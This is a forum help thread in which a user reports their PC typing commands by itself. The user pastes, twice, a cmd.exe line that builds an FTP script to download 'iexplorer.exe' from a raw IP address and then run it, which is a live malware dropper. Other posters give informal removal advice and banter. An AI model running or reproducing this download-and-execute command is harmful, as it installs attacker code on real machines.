Author Topic: Uhm, virus? Help?  (Read 10592 times)

So uh, I think I have a virus or something?
I don't know, at random intervals, my computer types something into whatever program I'm in, I can't stop it. It's supposed to be typing in cmd.exe, I think, but it doesn't correctly start it, so it just types into the active window
I left it on all night while downloading something and the active window was notepad, heres what was in it:
Code: [Select]
start %systemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

Erm..?
Anybody know what this is and how to get rid of it? I did a quickscan with mbam pro and it caught 9 threats, I thought I got rid of it when an hour after the scan isttart %s
ystemroot%\system32\cmd.exe
del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq

Okay, I didn't copy paste that, the thing just did it again. What the forget.
Anyway, what I was saying, I thought I got rid of it when an hour after the scan it did it again. Then I did a full scan with MBAM, and no threats were detected
So what the forget?

Do you live in Argentina?
That's a serious question related to the IP

Do you live in Argentina?
That's a serious question related to the IP
No. That's not my IP.

I live in the USA, Pennsylvania to be exact.

No. That's not my IP.

I live in the USA, Pennsylvania to be exact.
Pennsylvania buddies :D

did you find a hot Russian girl in your area?

did you find a hot Russian girl in your area?
I wouldn't be paying attention.
But I do know a russian girl, I'm just not in any position to say weather shes hot or not lol.

I wouldn't be paying attention.
But I do know a russian girl, I'm just not in any position to say weather shes hot or not lol.

Someone is using some sort of Desktop Remoting. Did your parents do this? If not it's a virus. Boot into safe mode and try to see if you can find it's location.

Dude seriously cut off your computer from the network. Someone is using a backdoor worm to try and access your computer.

I really hope you didn't use any information since that popped up. Like credit card number or anything. If so then you're forgeted. It's monitoring your activities and stealing information.
« Last Edit: February 03, 2013, 12:29:50 PM by Blockzillahead »

Dude seriously cut off your computer from the network. Someone is using a backdoor worm to try and access your computer.
Everybody within range of my network is computer illiterate lol. Nobody around here would be able to do that.

Besides, WPA2 secured network with a 28 character password. Hm.

http://www.ip-address.org/lookup/ip-locator.php?track=181.166.154.188
Are you absolutely sure you don't live in Argentina
If it was a backdoor, it'd be through your network. Turn it off and open up notepad for a while.

Everybody within range of my network is computer illiterate lol. Nobody around here would be able to do that.

Besides, WPA2 secured network with a 28 character password. Hm.

It's a virus. It's trying to hijack your computer. Download and install Malwarebytes's Anti-Malware. Update virus signature, disconnect from internet and run a scan.

This isn't even funny. You either do this as fast as possible, or you get forgeted over because they probably already stole half your stuff.

In your malwarebytes antimalware log, What happened to be the names of the threats detected?

In your malwarebytes antimalware log, What happened to be the names of the threats detected?
Actually we should stop helping. OP doesn't seem to care he's getting hacked.

Actually we should stop helping. OP doesn't seem to care he's getting hacked.
If I didn't care I wouldn'tve posted this topic.

In your malwarebytes antimalware log, What happened to be the names of the threats detected?
One moment.
http://www.ip-address.org/lookup/ip-locator.php?track=181.166.154.188
Are you absolutely sure you don't live in Argentina
If it was a backdoor, it'd be through your network. Turn it off and open up notepad for a while.
...
Nooo, I'm totallyy not sure that I live in another country. Jesus, somebody shoulda told me that..